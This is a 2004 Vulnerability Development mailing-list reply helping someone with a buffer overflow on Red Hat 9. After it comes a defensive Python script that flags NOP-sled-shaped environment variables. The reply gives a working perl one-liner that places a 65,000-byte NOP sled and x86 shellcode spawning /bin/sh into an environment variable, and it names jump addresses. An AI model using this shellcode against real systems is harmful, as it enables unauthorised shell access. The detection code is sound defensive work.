Vulnerability Development mailing list archives
Re: Buffer Overflow Help
From: Harry de Grote <rik.bobbaers () cc kuleuven ac be>
Date: Wed, 10 Nov 2004 12:01:24 +0200
On Tuesday 09 November 2004 04:09, eip () tampabay rr com wrote: <snip>
> I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat 9 box kernel 2.4.20-31.9. Am I doing something wrong?
no, you aren't
but... RH does randomize the stack a little iirc
so, my way of doing stuff then, is just brute force it! :)
(you could also return to libc or whatever)
best way to do it (i think) is : put your shellcode in the env...
export SHELLCODE=`perl -e '{print "\x90"x65000 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`
that should give you some breathing space for where to jump to...
shellcode starts (on my box) at 0xbfff0027, so everything from there to
0xbffffe00 should do fine...
--
harry
aka Rik Bobbaers
K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaers () cc kuleuven ac be -=- http://harry.ulyssis.org
"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"
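The reply above relies on a very long run of 0x90 (x86 NOP) bytes in an environment variable so that an imprecise return address still lands somewhere on the sled. That shape is also what a defender can look for. The following is an added example, not code from the original post or its author: it parses a Linux /proc/<pid>/environ-style block (NUL-separated KEY=VALUE entries) and flags any entry dominated by a long run of a single NOP byte. The run-length threshold and the sample environment block are assumptions constructed for this example; the sample's "payload" is a plain placeholder string, not machine code.

```python
"""Flag environment strings shaped like a NOP sled (added example)."""
from typing import List, Tuple

# Longest run of 0x90 a legitimate environment value plausibly contains.
# Assumed threshold for this example; tune it for your own fleet.
DEFAULT_MIN_RUN = 256
NOP_BYTE = 0x90


def parse_environ(block: bytes) -> List[Tuple[bytes, bytes]]:
    """Split a /proc/<pid>/environ-style block into (name, value) pairs.

    Entries are NUL-separated; an entry without '=' yields an empty value.
    """
    pairs = []
    for entry in block.split(b"\0"):
        if not entry:
            continue
        name, sep, value = entry.partition(b"=")
        pairs.append((name, value if sep else b""))
    return pairs


def longest_run(value: bytes, byte: int = NOP_BYTE) -> int:
    """Length of the longest contiguous run of `byte` inside `value`."""
    best = cur = 0
    for b in value:
        cur = cur + 1 if b == byte else 0
        if cur > best:
            best = cur
    return best


def find_sleds(block: bytes, min_run: int = DEFAULT_MIN_RUN) -> List[Tuple[str, int, int]]:
    """Return (name, run_length, value_length) for entries that look like sleds."""
    hits = []
    for name, value in parse_environ(block):
        run = longest_run(value)
        if run >= min_run:
            hits.append((name.decode("latin-1"), run, len(value)))
    return hits


def scan_pid(pid: int, min_run: int = DEFAULT_MIN_RUN) -> List[Tuple[str, int, int]]:
    """Scan a live process's environment on Linux (requires read permission)."""
    with open(f"/proc/{pid}/environ", "rb") as f:
        return find_sleds(f.read(), min_run)


# Constructed sample block (not captured from any real system). The value after
# the sled is a placeholder string, deliberately not executable code.
SAMPLE_ENVIRON = (
    b"HOME=/home/user\0"
    b"PATH=/usr/bin:/bin\0"
    b"SHELLCODE=" + b"\x90" * 5000 + b"<placeholder, not real shellcode>\0"
    b"LANG=en_US.UTF-8\0"
)

if __name__ == "__main__":
    for name, run, total in find_sleds(SAMPLE_ENVIRON):
        print(f"{name}: run of {run} NOP bytes in a {total}-byte value")
```

Running it against SAMPLE_ENVIRON reports only the SHELLCODE entry; HOME, PATH and LANG contain no 0x90 bytes at all. In practice the threshold matters more than the parser: a few dozen 0x90 bytes can appear in binary-ish values (locale data, serialized blobs), whereas a sled built to survive stack randomization needs thousands, so a threshold in the hundreds keeps the check quiet on normal processes.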